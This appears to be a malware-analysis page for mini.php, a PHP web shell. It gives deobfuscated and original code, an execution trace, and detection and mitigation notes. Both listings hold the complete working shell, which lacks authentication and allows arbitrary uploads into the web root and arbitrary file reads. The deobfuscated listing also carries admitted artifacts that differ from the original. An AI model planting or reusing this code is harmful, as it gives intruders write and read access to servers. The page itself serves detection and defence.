PHP Malware Analysis

mini.php

md5: 6c4409464c98192e81f34305164ec661


Screenshot


Attributes

Files

Input

Title


Deobfuscated PHP code

<?php

// Analyst summary (from the code below): a single-file upload/download helper.
// No authentication, authorisation or allow-list check appears anywhere in it.
//   * POST with a multipart field named 'file': the upload is moved into
//     $_SERVER['DOCUMENT_ROOT'] under the client-supplied file name.
//   * GET with a 'file' query parameter: the named path is read with
//     file_get_contents() and sent back as an attachment.
// Defensive relevance: anyone who can reach this URL can write files into the
// web root and read any file the PHP process can read.
// Detection: in web-server logs, look for multipart POSTs to this script and
// GET requests carrying a file= parameter; the HTML title in the markup below
// is a usable content signature.
// Mitigation: serve upload directories with script execution disabled, so a
// dropped file of this kind cannot run.

// Shared name of the multipart upload field and of the GET query parameter.
$p = 'file';
// Status text shown in the <pre> element; also holds the 'download' sentinel.
$o = null;
// Upload branch: runs on POST when the trimmed client file name is non-empty.
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post' && isset($_FILES[$p]['name']) && ($_FILES[$p]['name'] = trim($_FILES[$p]['name'])) && strlen($_FILES[$p]['name']) > 0) {
    // Destination is the document root plus the client-supplied name; this
    // script applies no extension, type or size restriction to the upload.
    $o = $_SERVER['DOCUMENT_ROOT'] . '/' . $_FILES[$p]['name'];
    // '@' suppresses the PHP warning, so a failed move shows only the message below.
    if (@move_uploaded_file($_FILES[$p]['tmp_name'], $o) === false) {
        $o = 'ERROR: Cannot upload file.';
    } else {
        // NOTE(review): this literal looks like a deobfuscator artifact. The
        // "Original PHP code" listing on this page interpolates {$o} (the
        // destination path) here instead of the error text.
        $o = "SUCCESS: File was uploaded to 'ERROR: Cannot upload file.'";
    }
    unset($_FILES[$p]);
}
// Download branch: runs on GET when the trimmed 'file' parameter is non-empty.
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'get' && isset($_GET[$p]) && ($_GET[$p] = trim($_GET[$p])) && strlen($_GET[$p]) > 0) {
    // The request parameter is passed to file_get_contents() without validation.
    $o = @file_get_contents($_GET[$p]);
    if ($o === false) {
        $o = 'ERROR: Cannot download file';
    } else {
        // Force a browser download named after the last component of the requested path.
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($_GET[$p]) . '"');
        // NOTE(review): deobfuscator artifact. The "Original PHP code" listing
        // has `echo $o;` here, which emits the contents of the file just read.
        echo "ERROR: Cannot download file";
        // Sentinel value: tells the code below to skip the HTML form.
        $o = 'download';
    }
    unset($_GET[$p]);
}
// The author's own commented-out output code follows; it is kept as found.
/*if($o!='download'){echo"<pre>{$o}</pre>";unset($o);}/*@gc_collect_cycles();*/
// Render the upload form and status text unless a download was just served.
if ($o != 'download') {
    ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="<?php 
    // The form posts back to this script, addressed by its own file name.
    echo './' . basename($_SERVER['SCRIPT_FILENAME']);
    ?>"><input name="<?php 
    echo $p;
    ?>" type="file" required="required"><input type="submit" value="Upload"></form><pre><?php 
    // The status text is written into the page without HTML escaping.
    echo $o;
    unset($o);
    /*@gc_collect_cycles();*/
    ?></pre></body></html><?php 
}

Execution traces

data/traces/6c4409464c98192e81f34305164ec661_trace-1676258760.8327.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:26:26.730581]
1	0	1	0.000219	393512
1	3	0	0.000341	405720	{main}	1		/var/www/html/uploads/mini.php	0	0
1		A						/var/www/html/uploads/mini.php	1	$p = 'file'
1		A						/var/www/html/uploads/mini.php	1	$o = NULL
2	4	0	0.000384	405720	strtolower	0		/var/www/html/uploads/mini.php	1	1	'GET'
2	4	1	0.000398	405784
2	4	R			'get'
2	5	0	0.000413	405720	strtolower	0		/var/www/html/uploads/mini.php	1	1	'GET'
2	5	1	0.000425	405784
2	5	R			'get'
2	6	0	0.000440	405720	basename	0		/var/www/html/uploads/mini.php	1	1	'/var/www/html/uploads/mini.php'
2	6	1	0.000455	405792
2	6	R			'mini.php'
1	3	1	0.000471	405720
			0.000500	314288
TRACE END   [2023-02-13 01:26:26.730906]


Generated HTML code

<html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="./mini.php"><input name="file" type="file" required="required"><input type="submit" value="Upload"></form><pre></pre></body></html>

Original PHP code

<?php /* Analyst note, added for review and not part of the sample (so the md5
   listed on this page presumably will not match this annotated text).
   This is the minified original of the deobfuscated listing on this page.
   It has no authentication check. A POST with a 'file' upload is moved into
   DOCUMENT_ROOT under the client-supplied name; a GET with a 'file' parameter
   is read with file_get_contents() and returned as an attachment.
   Unlike the deobfuscated rendering, the success message here interpolates
   {$o} (the destination path) and the download branch echoes $o (the file
   contents). */ $p='file';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='post'&&isset($_FILES[$p]['name'])&&($_FILES[$p]['name']=trim($_FILES[$p]['name']))&&strlen($_FILES[$p]['name'])>0){$o=$_SERVER['DOCUMENT_ROOT'].'/'.$_FILES[$p]['name'];if(@move_uploaded_file($_FILES[$p]['tmp_name'],$o)===false){$o='ERROR: Cannot upload file.';}else{$o="SUCCESS: File was uploaded to '{$o}'";}unset($_FILES[$p]);}if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@file_get_contents($_GET[$p]);if($o===false){$o='ERROR: Cannot download file';}else{header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($_GET[$p]).'"');echo $o;$o='download';}unset($_GET[$p]);}/*if($o!='download'){echo"<pre>{$o}</pre>";unset($o);}/*@gc_collect_cycles();*/ ?><?php if($o!='download'): ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="<?php echo './'.basename($_SERVER['SCRIPT_FILENAME']); ?>"><input name="<?php echo $p; ?>" type="file" required="required"><input type="submit" value="Upload"></form><pre><?php echo $o;unset($o);/*@gc_collect_cycles();*/ ?></pre></body></html><?php endif; ?>